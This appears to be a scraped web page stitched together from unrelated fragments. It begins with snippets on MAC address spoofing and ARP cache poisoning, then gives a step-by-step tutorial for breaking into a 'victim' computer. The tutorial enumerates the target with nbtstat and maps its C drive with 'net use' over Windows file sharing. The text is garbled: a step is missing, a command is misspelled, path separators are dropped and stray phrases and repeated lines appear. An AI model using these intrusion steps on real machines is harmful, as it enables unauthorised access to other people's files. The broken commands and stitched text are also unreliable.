Step 1: Finding the Device That You Want To Spoof. (wireshark) Spoof the. Jan 09, 2007 A hacker can easily find out the authorized MAC address, change their network card’s MAC address to the authorized ones and poison the ARP cache to prevent the owner’s machine from connecting to it. Here’s an example of Belkin Play Max F7D4401 v1 router. I’m going to answer the question you asked, then the question you might mean. The MAC address is the physical “serial number” of the network card in your device.
Hacking computer with just IP address
In my Last Post I guide you to get the IP address of Your victim. Now i am going to guide you how to access the victim system remotely using the IP address.
Steps to Follow:
Step 1:
Now Go to Star and click Run and then type as “CMD” and hit enter.
command prompt will open.
Step 2:
Type in cmd as “nbtstat -a IPaddressOfVictim” and hit enter.
For eg:
nbstat -a 223.222.222.222
If you see this your in NetBIOS Remote Machine Name Table
Name Type Status —————————————————————
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = xx-xx-xx-xx-xx-xx
—————————————————————
If you don’t get the number <20>.
The victim disabled the File And Printer Sharing, find another victim.
Step 4:
Now type as “net use x: IPaddressOfVictimCDISK” and hit enter>
Cool Mac Hacks
replace with ip address of vitim in the place of “IPaddressOfVictim.
You can give any letter instead of ‘x’.
For eg:
net use x:223.222.222.222CDISK
Step 5:
Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive
Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:.